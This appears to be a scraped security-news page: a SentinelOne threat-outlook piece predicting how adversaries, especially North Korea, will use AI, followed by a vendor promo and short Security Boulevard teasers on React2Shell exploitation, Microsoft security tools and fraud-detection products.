The use of AI by adversaries will likely manifest in two ways outside of the ongoing discourse. The vast majority of attackers’ use of AI to date has been around driving greater efficiency and automating existing parts of their intrusion lifecycle. The intelligence assessments to date tend to skew towards technical improvements and capabilities.

If we look back on past assessments of emerging technologies — and let’s be honest, AI is without a doubt an emerging technology — two unexpected things tend to happen.

First, threat actors’ use of new technologies almost inevitably blurs existing assessment lines, typically around tradecraft and attribution. If we apply this to AI, the most likely upcoming shift will be lower-level/smaller groups gaining access to capabilities that previously defined government-affiliated programs. In particular, AI’s ability to provide language capabilities will bring low-level cybercriminals into the realm of government programs with full linguistic capabilities. This was an incredibly important capability distinction, and it is likely to disappear in the coming year solely because of AI.

The second likely outcome will be an almost inevitable surprise from DPRK’s AI use. DPRK cyber activities have previously caught intelligence organizations off-guard multiple times, with examples ranging from destructive attacks geared towards stopping a movie release to the current IT-worker situation.

Additionally, AI has proven highly useful and effective in DPRK efforts; again, the IT workers are a great example. When we pair these realities with the vast amount of illicit revenue generated by DPRK’s efforts at stealing cryptocurrency, we see an interesting situation emerging.

We have a cyber effort known to produce surprises, actively leveraging AI in a large and previously unforeseen manner, and producing large amounts of revenue for the regime through cyber actions, both cryptocurrency theft and IT-worker payments.

There is a high likelihood some portion of these illicit gains will be reinvested into DPRK cyber programs to increase their scope, scale, and impact, programs that are already actively pushing the bounds of AI use. While we do not have a specific expected outcome, the likelihood of an unexpected, large, AI-driven surprise from DPRK is something we should be mindful of and prepared to tackle on the defensive side.

Steve Stone, SVP, Threat Discovery & Response

 

Looking Ahead & Protection Now

Moving ahead demands strong, decisive leadership based on confident security choices and the courage to evolve. For all those committed to a safer and more resilient future, SentinelOne is ready to help secure every aspect of your business. Contact us to learn more about cybersecurity built for what’s next.

Protect Your Endpoint
See how AI-powered endpoint security from SentinelOne can help you prevent, detect, and respond to cyber threats in real time.

Rebrand Cybersecurity from “Dr. No” to “Let’s Go”

When it comes to cybersecurity, it often seems the best prevention is to follow a litany of security “do’s” and “don’ts.” A former colleague once recalled that at one organization where he worked, this approach led to such a long list of guidance that the cybersecurity function was playfully referred to as a famous James..

The post Rebrand Cybersecurity from “Dr. No” to “Let’s Go” appeared first on Security Boulevard.

Exploitation Efforts Against Critical React2Shell Flaw Accelerate

Exploitation efforts by China-nexus groups and other bad actors against the critical and easily abused React2Shell flaw in the popular React and Next.js software accelerated over the weekend, with payloads ranging from credential stealers and initial-access tooling to downloaders, crypto-miners, and the NoodleRat backdoor.

The post Exploitation Efforts Against Critical React2Shell Flaw Accelerate appeared first on Security Boulevard.

AI-Powered Security Operations: Governance Considerations for Microsoft Sentinel Enterprise Deployments

The Tech Field Day Exclusive with Microsoft Security (#TFDxMSSec25) spotlighted one of the most aggressive demonstrations of AI-powered security operations to date. Microsoft showcased how Sentinel’s evolving data lake and graph architecture now drive real-time, machine-assisted threat response. The demo of “Attack Disruption” captured the promise—and the unease—of a security operations center where AI acts..

The post AI-Powered Security Operations: Governance Considerations for Microsoft Sentinel Enterprise Deployments appeared first on Security Boulevard.

Microsoft Takes Aim at “Swivel-Chair Security” with Defender Portal Overhaul

At a recent Tech Field Day Exclusive event, Microsoft unveiled a significant evolution of its security operations strategy—one that attempts to solve a problem plaguing security teams everywhere: the exhausting practice of jumping between multiple consoles just to understand a single attack. The problem: too many windows, not enough clarity. Security analysts have a name..

The post Microsoft Takes Aim at “Swivel-Chair Security” with Defender Portal Overhaul appeared first on Security Boulevard.

TransUnion Extends Ability to Detect Fraudulent Usage of Devices

TransUnion today added to its Device Risk fraud-combatting service the ability to create digital fingerprints, without relying on cookies, that identify risky devices and other hidden anomalies in real time. Clint Lowry, vice president of global fraud solutions at TransUnion, said these capabilities extend a service that makes use of machine learning models..

The post TransUnion Extends Ability to Detect Fraudulent Usage of Devices appeared first on Security Boulevard.

Nudge Security Extends Ability to Secure Data in the AI Era

Nudge Security today extended the scope of its namesake security and governance platform to monitor sensitive data shared via uploads and integrations with artificial intelligence (AI) services, and it can now also identify the individuals sharing that data by department or by the specific tools used. In addition, Nudge Security is now making it..

The post Nudge Security Extends Ability to Secure Data in the AI Era appeared first on Security Boulevard.
